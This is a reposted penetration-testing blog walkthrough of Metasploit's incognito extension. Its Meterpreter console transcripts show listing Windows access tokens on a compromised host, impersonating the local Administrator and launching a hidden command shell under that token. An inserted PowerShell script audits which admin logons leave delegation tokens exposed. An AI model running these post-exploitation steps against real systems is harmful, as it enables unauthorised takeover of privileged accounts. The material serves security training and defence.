Inspiration & Genius – One and the Same

More on working with Incognito and Metasploit

From Carnal0wnage http://carnal0wnage.blogspot.com

Since a buddy asked for some clarification on using incognito extension with Metasploit/Meterpreter I’ll post some more notes on it.

The background you need is here:

http://www.mwrinfosecurity.com/publications/mwri_security-implications-of-windows-access-tokens_2008-04-14.pdf

Let’s set up the scenario.

We either exploited something (yea!) or we guessed an admin password and used the psexec module (that’s what I did). The psexec module will drop us to a SYSTEM shell if all went well.

msf exploit(psexec) > sessions

Active sessions
===============

Id Description Tunnel
-- ----------- ------
1 Meterpreter 192.168.1.102:52595 -> 192.168.1.103:31851

msf exploit(psexec) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer: ORACLE-ENT
OS : Windows .NET Server (Build 3790, Service Pack 2).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > use incognito
Loading extension incognito...success.

Now we want to query what tokens are available.

Incognito Commands
==================

Command Description
------- -----------
add_group_user Attempt to add a user to a global group with all tokens
add_localgroup_user Attempt to add a user to a local group with all tokens
add_user Attempt to add a user with all tokens
impersonate_token Impersonate specified token
list_tokens List tokens available under current user context
snarf_hashes Snarf challenge/response hashes for every token

meterpreter > list_tokens
Usage: list_tokens

Lists all accessible tokens and their privilege level

OPTIONS:

-g List tokens by unique groupname
-u List tokens by unique username

meterpreter > list_tokens -u

Delegation Tokens Available
========================================
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM
ORACLE-ENT\Administrator

Impersonation Tokens Available
========================================
NT AUTHORITY\ANONYMOUS LOGON
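The delegation list above is what a defender should read as exposure: any account with a delegation-level token on a host can be impersonated by whoever reaches SYSTEM there. The following PowerShell check is an added example, not part of the original post or of incognito; run as an administrator on a host you manage, it inventories current logon sessions and flags local administrators whose logon type leaves a delegation-level token behind, using the MWR paper's rule of thumb that interactive, service and batch style logons create delegation tokens while network logons create impersonation tokens (that mapping, held in $delegationTypes, is an assumption of the example).

```powershell
# Added example (not from the original post): list which accounts currently have logon
# sessions on this host, i.e. what an attacker who obtains SYSTEM here would see in
# list_tokens, and warn when a local admin has left a delegation-level token around.
# Assumption: logon-type -> token-level mapping follows the MWR paper's rule of thumb.

$logonTypeNames = @{
    2 = 'Interactive'; 3 = 'Network'; 4 = 'Batch'; 5 = 'Service'; 7 = 'Unlock'
    8 = 'NetworkCleartext'; 9 = 'NewCredentials'; 10 = 'RemoteInteractive'; 11 = 'CachedInteractive'
}
$delegationTypes = @(2, 4, 5, 7, 10, 11)   # assumption: these leave delegation tokens

# Members of the local Administrators group, normalised to lower-case DOMAIN\name
$admins = Get-LocalGroupMember -Group 'Administrators' |
    ForEach-Object { $_.Name.ToLowerInvariant() }

# Index logon sessions by LogonId so the user association can be joined to its type
$sessions = @{}
Get-CimInstance -ClassName Win32_LogonSession |
    ForEach-Object { $sessions[$_.LogonId] = $_ }

$report = Get-CimInstance -ClassName Win32_LoggedOnUser | ForEach-Object {
    $account = '{0}\{1}' -f $_.Antecedent.Domain, $_.Antecedent.Name
    $session = $sessions[$_.Dependent.LogonId]
    if ($null -eq $session) { return }        # stale association, nothing to report
    $type = [int]$session.LogonType
    [pscustomobject]@{
        Account    = $account
        LogonType  = if ($logonTypeNames.ContainsKey($type)) { $logonTypeNames[$type] } else { "Type$type" }
        TokenLevel = if ($delegationTypes -contains $type) { 'Delegation' } else { 'Impersonation' }
        LocalAdmin = $admins -contains $account.ToLowerInvariant()
        Since      = $session.StartTime
    }
} | Sort-Object Account, LogonType -Unique

$report | Format-Table -AutoSize

# The finding that matters: privileged accounts exposing delegation tokens on this host
$exposed = $report | Where-Object { $_.LocalAdmin -and $_.TokenLevel -eq 'Delegation' }
if ($exposed) {
    Write-Warning ('{0} admin logon session(s) expose delegation tokens here: {1}' -f
        @($exposed).Count, (($exposed.Account | Select-Object -Unique) -join ', '))
}
```

Accounts such as NT AUTHORITY\SYSTEM and the service accounts will always appear; the rows worth acting on are the domain or local admins who logged on interactively (or via RDP) to a box that should not be trusted with their credentials.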

We want to become the ORACLE-ENT\Administrator user.

meterpreter > impersonate_token
Usage: impersonate_token

Instructs the meterpreter thread to impersonate the specified token. All other actions
will then be made in the context of that token.

Hint: Double backslash DOMAIN\\name (meterpreter quirk)
Hint: Enclose with quotation marks if name contains a space

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > impersonate_token ORACLE-ENT\\Administrator
[+] Delegation token available
[+] Successfully impersonated user ORACLE-ENT\Administrator
meterpreter > getuid
Server username: ORACLE-ENT\Administrator

Ok, should you need to get back to SYSTEM, just do a rev2self:

meterpreter > rev2self
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > impersonate_token ORACLE-ENT\\Administrator
[+] Delegation token available
[+] Successfully impersonated user ORACLE-ENT\Administrator
meterpreter > getuid
Server username: ORACLE-ENT\Administrator

Now you’ll probably want to run commands as that user…I hope that was the point of all this…

After you load the incognito extension you’ll get an extra option (-t) in your execute options:

meterpreter > execute
Usage: execute -f file [options]

Executes a command on the remote machine.

OPTIONS:

-H Create the process hidden from view.
-a The arguments to pass to the command.
-c Channelized I/O (required for interaction).
-d The 'dummy' executable to launch when using -m.
-f The executable command to run.
-h Help menu.
-i Interact with the process after creating it.
-m Execute from memory.
-t Execute process with currently impersonated thread token

We need to use the “-t” so the new process runs with the impersonated thread token; otherwise you’ll get a shell as SYSTEM (or whoever you were before impersonating).

meterpreter > execute -f cmd.exe -H -c -i -t
Process 2936 created.
Channel 6 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\>whoami
whoami
oracle-ent\administrator

C:\>
